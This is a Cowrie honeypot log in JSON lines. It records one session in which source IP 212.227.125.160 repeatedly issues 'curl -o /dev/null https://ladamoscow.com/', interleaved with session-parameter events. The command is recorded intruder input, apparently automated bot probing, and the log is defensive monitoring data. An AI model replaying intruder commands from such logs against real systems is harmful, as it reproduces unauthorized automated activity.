{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.368043Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.407252Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.408122Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.444820Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.445823Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.486978Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.487882Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.526320Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.527450Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.564777Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.565910Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.845999Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.846898Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.888909Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.889814Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.928433Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.929545Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.973138Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.974140Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.014159Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.015139Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.052525Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.053431Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.092369Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.093268Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.137792Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.138751Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.176512Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.177384Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.216915Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.217968Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.255558Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.256689Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.294307Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.295243Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.337775Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.338739Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.375208Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.376332Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.413486Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.414363Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.452417Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.453397Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.490293Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.491324Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.532525Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.533478Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.570581Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.571758Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.613083Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.613959Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.650487Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.651523Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.688552Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.690291Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.728484Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.729451Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.766551Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.767578Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.806085Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.807414Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.844349Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.845350Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.882434Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.883422Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.923214Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.924469Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:54.963326Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:54.964277Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.001647Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.002756Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.044823Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.045857Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.083043Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.083994Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.123598Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.124550Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.165789Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.166740Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.204450Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.205448Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.242453Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.243737Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.281371Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.282279Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.322623Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.323683Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.363093Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.364285Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.403500Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.404459Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.441668Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.442739Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.479687Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.480662Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.517611Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.518652Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.556214Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.557117Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.598846Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.599800Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.636912Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.637856Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.676526Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.677664Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.721564Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.722528Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.759470Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.760208Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.800225Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.801394Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.840979Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.841848Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.894555Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.895484Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.932306Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.933197Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:55.973272Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:55.974180Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.011992Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.012904Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.052332Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.053375Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.092376Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.093549Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.132375Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.133296Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.170351Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.171429Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
